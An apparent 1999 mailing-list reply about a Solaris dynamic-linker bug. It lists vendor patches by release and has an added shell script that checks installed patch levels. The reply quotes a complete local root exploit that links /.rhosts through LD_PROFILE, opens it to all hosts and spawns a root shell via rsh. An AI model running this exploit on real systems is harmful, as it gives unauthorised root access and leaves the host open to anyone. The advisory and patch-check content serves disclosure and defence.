>works on solaris 2.6 sparc anyway...
>
>#! /bin/ksh
># LD_PROFILE local root exploit for solaris
># steveat_private 19990922
>umask 000
>ln -s /.rhosts /var/tmp/ps.profile
>export LD_PROFILE=/usr/bin/ps
>/usr/bin/ps
>echo + + > /.rhosts
>rsh -l root localhost csh -i

This is bug 4150646 (or rather, 1241843, which resurfaced after an
extensive rewrite of the dynamic linker).

It's been fixed in Solaris 7 and with the following patches in other releases:

103242-07: SunOS 5.5: linker patch
103243-07: SunOS 5.5_x86: linker patch
103627-11: SunOS 5.5.1: Linker patch
103628-10: SunOS 5.5.1_x86: Linker patch
105490-07: SunOS 5.6: linker patch
105491-05: SunOS 5.6_x86: linker patch

The bug was originally fixed in 5.5.1 and back patched; I rediscovered that
it was back in 2.6 (which also meant it was in the process of being
patched back into 5.5/5.5.1, but I think those patches were held up
until the regression was fixed); this was all well before S7 was released.

The original bug was also fixed in the following patches:

102049-05: SunOS 5.4: linker fixes
102303-05: SunOS 5.4: POINT PATCH: linker fixes
102304-05: SunOS 5.4_x86: POINT PATCH: linker fixes
102778-03: SunOS 5.4_x86: linker patch

Casper
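An added example, not part of the original message: a shell check that maps a host's release and architecture to the linker patch revision named in the first list above and tests `showrev -p` output against it. The function names and the sample input are constructed for illustration; it assumes `showrev -p` lines begin with `Patch: <id>-<rev>`, that `uname -p` reports `sparc` or `i386`, and that Solaris 7 reports release 5.7.

```shell
#!/bin/sh
# Added example. Patch IDs and revisions are the ones listed in the message.

# required_patch RELEASE ARCH -> minimum fixed linker patch for that host
required_patch() {
    case "$1/$2" in
        5.5/sparc)   echo 103242-07 ;;
        5.5/i386)    echo 103243-07 ;;
        5.5.1/sparc) echo 103627-11 ;;
        5.5.1/i386)  echo 103628-10 ;;
        5.6/sparc)   echo 105490-07 ;;
        5.6/i386)    echo 105491-05 ;;
        *)           return 1 ;;
    esac
}

# patch_is_current ID-REV: reads `showrev -p` output on stdin and succeeds
# when the same patch ID is installed at that revision or a later one.
# A superseding patch with a different ID is not recognised.
patch_is_current() {
    awk -v want="$1" '
        BEGIN { split(want, w, "-"); found = 0 }
        $1 == "Patch:" {
            split($2, p, "-")
            if (p[1] == w[1] && p[2] + 0 >= w[2] + 0) found = 1
        }
        END { exit(found ? 0 : 1) }'
}

# linker_fix_status RELEASE ARCH: reads `showrev -p` output on stdin.
# Prints PATCHED (status 0), "MISSING <patch>" (1) or UNKNOWN (2).
linker_fix_status() {
    if [ "$1" = 5.7 ]; then echo PATCHED; return 0; fi   # fixed in Solaris 7
    want=$(required_patch "$1" "$2") || { echo UNKNOWN; return 2; }
    if patch_is_current "$want"; then echo PATCHED; return 0; fi
    echo "MISSING $want"; return 1
}

# Constructed sample of `showrev -p` output from a 5.6 sparc host whose
# linker patch is older than -07 (999999-01 is a placeholder ID).
SAMPLE_SHOWREV='Patch: 105490-04 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu
Patch: 999999-01 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsr'

printf '%s\n' "$SAMPLE_SHOWREV" | linker_fix_status 5.6 sparc || true
```

On a live host the call would be `showrev -p | linker_fix_status "$(uname -r)" "$(uname -p)"`.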